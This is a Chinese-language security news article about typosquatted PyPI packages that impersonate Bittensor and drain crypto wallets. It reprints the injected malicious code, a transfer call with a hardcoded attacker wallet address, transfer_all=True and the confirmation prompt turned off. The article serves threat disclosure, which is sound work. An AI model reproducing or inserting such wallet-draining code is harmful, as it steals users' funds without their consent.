
网络安全研究人员发现,针对Bittensor生态系统的复杂加密货币窃取活动正通过Python包索引(PyPI)分发恶意软件包实施攻击。攻击者采用"typosquatting"(域名抢注)技术,诱骗开发者和用户安装被篡改的Bittensor软件包版本,最终在常规质押操作中清空用户钱包。
此次攻击经过精心策划,2025年8月6日,五个拼写错误的软件包在短短25分钟内集中发布。这些软件包包括"bitensor"(缺少字母't')、"bittenso"(截断版本)和"qbittensor"(添加前缀)等变体,均旨在模仿真实的bittensor和bittensor-cli软件包。
攻击手法分析
攻击者策略性地选择了9.9.4和9.9.5版本号,与合法软件包版本高度接近,通过开发者的拼写错误或复制粘贴失误,最大化提高误装概率。GitLab分析师通过自动化软件包监控系统发现了这一威胁,该系统标记了与热门Bittensor软件包相关的可疑活动。
调查显示,这是一次精心设计的攻击,利用了区块链常规操作中的信任机制,专门针对参与质押活动且通常持有大量加密货币的用户。
被劫持的质押机制技术分析
该攻击的技术复杂性体现在对bittensor_cli/src/commands/stake/add.py文件中stake_extrinsic函数的合法质押功能进行了精准修改。攻击者在第275行插入恶意代码,完全颠覆了预期的质押流程:
result = await transfer_extrinsic(
subtensor=subtensor,
wallet=wallet,
destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
amount=amount,
transfer_all=True,
prompt=False
)
这段注入代码通过设置transfer_all=True来清空整个钱包而非仅转移预期的质押金额,同时prompt=False绕过了用户确认对话框,具有极高的破坏效率。硬编码的目标钱包地址作为被盗资金的收集点,随后通过涉及多个中间钱包的多跳洗钱网络进行资金转移,最终到达整合地址。
参考来源:
Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)



